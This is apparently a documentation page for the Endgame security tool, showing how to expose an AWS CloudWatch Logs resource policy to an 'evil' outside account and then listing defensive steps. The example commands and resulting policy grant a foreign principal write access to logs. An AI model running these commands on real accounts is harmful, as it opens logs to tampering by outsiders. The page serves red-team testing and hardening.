CloudWatch Resource Policies allow other AWS services or IAM Principals to put log events into the account.
- To expose the resource using
endgame, run the following from the victim account:
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service cloudwatch --name test-resource-exposure- To view the contents of the exposed resource policy, run the following:
aws logs describe-resource-policies- Observe that the contents of the exposed resource policy match the example shown below.
{
"resourcePolicies": [
{
"policyName": "test-resource-exposure",
"policyDocument": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":[\"logs:PutLogEventsBatch\",\"logs:PutLogEvents\",\"logs:CreateLogStream\"],\"Resource\":\"arn:aws:logs:*\"}]}",
"lastUpdatedTime": 1613244111319
}
]
}TODO
‼️ Note: At the time of this writing, AWS Access Analyzer does NOT support auditing of this resource type to prevent resource exposure. We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool. 😊
- Trusted Accounts Only: Ensure that CloudWatch Logs access is only shared with trusted accounts, and that the trusted accounts truly need access to write to the CloudWatch Logs.
- Ensure access is necessary: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
- Restrict access to IAM permissions that could lead to exposing write access to your CloudWatch Logs: Tightly control access to the following IAM actions:
- logs:PutResourcePolicy: Creates or updates a resource policy allowing other AWS services to put log events to this account
- logs:DeleteResourcePolicy: Deletes a resource policy from this account. This revokes the access of the identities in that policy to put log events to this account.
- logs:DescribeResourcePolicies: Lists the resource policies in this account.
Also, consider using Cloudsplaining to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report here